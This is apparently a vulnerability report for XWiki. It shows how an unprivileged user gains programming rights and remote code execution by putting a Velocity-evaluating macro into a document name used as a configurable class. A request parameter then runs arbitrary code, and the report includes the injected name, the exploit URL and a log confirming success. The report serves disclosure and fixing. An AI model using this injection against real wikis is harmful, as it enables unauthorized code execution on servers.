Remote code execution through class name in configurable section

Steps to reproduce:

1. Log in as a user without script or programming right
2. Create a document named

   "/}}{{async context="request.parameters"}}{{velocity}}#evaluate($request.eval).WebHome

   .

3. Edit the class on this document to add some property
4. Edit the objects on this document to add an object of type "XWiki.ConfigurableClass" ("Custom configurable sections"). Set "Display in section" and "Display in category" to "other", "Configuration class" to the document you're editing and "Scope" to "Wiki and all spaces".
5. Open

   <xwiki-host>/xwiki/bin/view/Main/?sheet=XWiki.ConfigurableClass&xpage=view&eval=$services.logging.getLogger(%22attacker%22).error(%22Attack%20from%20translation%20success%20$hasProgramming%22)&section=other

   where <xwiki-host> is the URL of your XWiki installation.

Expected result:

An error is displayed that there is no object of the created class in the created document. No error is logged.

Actual result:

No object of class: {0} found in page {1}, can''t display configuration..WebHome, "/}}.WebHome"/}}

is displayed. Further, a log message

2023-08-01 14:04:22,230 [org.xwiki.rendering.async.internal.AsyncRendererJob@46efb007([async, macro, xwiki:XWiki.ConfigurableClass, 211, author, xwiki:XWiki.Admin, rendering.restricted, false, request.parameters, {xpage=[Ljava.lang.String;@30f9f8, sheet=[Ljava.lang.String;@146c49d5, section=[Ljava.lang.String;@4f27eb28, eval=[Ljava.lang.String;@41fd808d}, secureDocument, xwiki:XWiki.ConfigurableClass, 237])] ERROR attacker                       - Attack from translation success true 

confirms that the user has gained programming right.